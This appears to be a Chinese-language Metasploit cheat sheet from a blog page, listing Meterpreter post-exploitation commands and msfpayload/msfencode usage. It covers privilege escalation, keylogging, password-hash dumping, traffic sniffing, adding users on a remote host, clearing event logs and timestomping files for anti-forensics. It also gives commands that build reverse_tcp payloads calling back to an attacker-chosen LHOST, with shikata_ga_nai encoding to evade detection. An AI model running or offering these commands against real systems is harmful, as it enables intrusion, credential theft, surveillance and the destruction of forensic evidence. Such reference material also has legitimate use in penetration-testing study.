getsystem
通过各种攻击向量来提升系统用户权限 。
execute -f cmd.exe -i
执行cmd.exe命令并进行交互 。
execute -f cmd.exe -i -t
以所有可用令牌来执行cmd命令并隐藏该进程 。
rev2self
回到控制目标主机的初始用户账户下 。
reg command
在目标主机注册表中进行交互,创建,删除,查询等操作 。
setdesktop number
切换到另一个用户界面(该功能基于那些用户已登录) 。
screenshot
对目标主机的屏幕进行截图 。
upload file
向目标主机上传文件 。
download file
从目标主机下载文件 。
keyscan_start
针对远程目标主机开启键盘记录功能 。
keyscan_dump
存储目标主机上捕获的键盘记录 。
keyscan_stop
停止针对目标主机的键盘记录 。
getprivs
尽可能多的获取目标主机上的特权 。
uictl enable keyboard/mouse
接管目标主机的键盘和鼠标 。
background
将你当前的metasploit shell转为后台执行 。
hashdump
导出目标主机中的口令哈希值 。
use sniffer
加载嗅探模式 。
sniffer_interfaces
列出目标主机所有开放的网络端口 。
sniffer_dump interfaceID pcapname
在目标主机上启动嗅探 。
sniffer_start interfaceID packet-buffer
在目标主机上针对特定范围的数据包缓冲区启动嗅探 。
sniffer_stats interfaceID
获取正在实施嗅探网络接口的统计数据 。
sniffer_stop interfaceID
停止嗅探 。
add_user username password -h ip
在远程目标主机上添加一个用户 。
clearev
清楚目标主机上的日志记录 。
timestomp
修改文件属性,例如修改文件的创建时间(反取证调查) 。
reboot
重启目标主机 。
***MSFpayload命令***
msfpayload -h
msfpayload的帮助信息 。
msfpayload windows/meterpreter/bind_tcp O
列出所有windows/meterpreter/bind_tcp下可用的攻击载荷的配置项(任何攻击载荷都是可用配置的) 。
msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT X > payload.exe
创建一个metasploit的reverse_tcp攻击载荷,回连到LHOSTip的LPORT,将其保存为名为payload.exe的windows下可执行程序 。
msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT R > payload.raw
创建一个metasploit的reverse_tcp攻击载荷,回连到LHOSTip的LPORT,将其保存为名为payload.raw,该文件后面的msffencode中使用 。
msfpayload windows/meterpreter/reverse_tcp LPORT=PORT C > payload.c
创建一个metasploit的reverse_tcp攻击载荷,导出C格式的shellcode 。
msfpayload windows/meterpreter/reverse_tcp LPORT=PORT J > payload.java
创建一个metasploit的reverse_tcp攻击载荷,导出成以%u编码方式的javaScript语言字符串 。
***msfencode命令***
mefencode -h
列出msfencode的帮助命令 。
msfencode -l
列出所有可用的编码器 。
msfencode -t (c,elf,exe,java,is_le,js_be,perl,raw,ruby,vba,vbs,loop_vbs,asp,war,macho)
显示编码缓冲区的格式 。
msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5 -t exe
使用shikata_ga_nai编码器对payload.raw文件进行5编码,然后导出一个名为encoded_payload.exe的文件 。
推荐阅读
- MSF metasploit终端命令1
- win7电脑连接电视显示不全的解决方法
- 魅族16s PRO刷入第三方twrp
- w7右键清空剪贴板没有与之关联的程序执行该操作怎么
- Win7怎么删除索引的方法
- kali linux 免root安装搬砖
- 凛冬教你dell戴尔网卡驱动如何安装
- 凛冬教你windows无法访问指定设备如何解决
- 远程控制安卓设备